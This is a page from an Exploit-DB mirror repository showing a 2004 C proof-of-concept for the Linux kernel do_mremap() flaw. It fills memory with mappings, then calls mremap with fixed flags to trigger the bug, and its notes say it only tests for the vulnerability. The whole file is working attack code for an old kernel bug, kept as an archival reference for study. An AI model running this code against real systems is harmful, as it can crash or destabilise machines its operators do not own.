bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/154.c
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

104 lines
No EOL
2.3 KiB
C
Raw Permalink Blame History

/*
* Proof-of-concept exploit code for do_mremap() #2
*
* EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
*
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
#define VMA_SIZE 0x00003000
int main( void )
{
int i, ret;
void *base0;
void *base1;
i = 0;
while( 1 )
{
i++;
ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
VMA_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
if( ret == -1 )
{
perror( "mmap" );
break;
}
base0 = base1;
base1 = (void *) ret;
}
printf( "created ~%d VMAs\n", i );
base0 += 0x1000;
base1 += 0x1000;
printf( "now mremapping 0x%08X at 0x%08X\n",
(int) base1, (int) base0 );
real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );
printf( "kernel may not be vulnerable\n" );
return( 0 );
}
// milw0rm.com [2004-02-18]
Reference in a new issue View git blame Copy permalink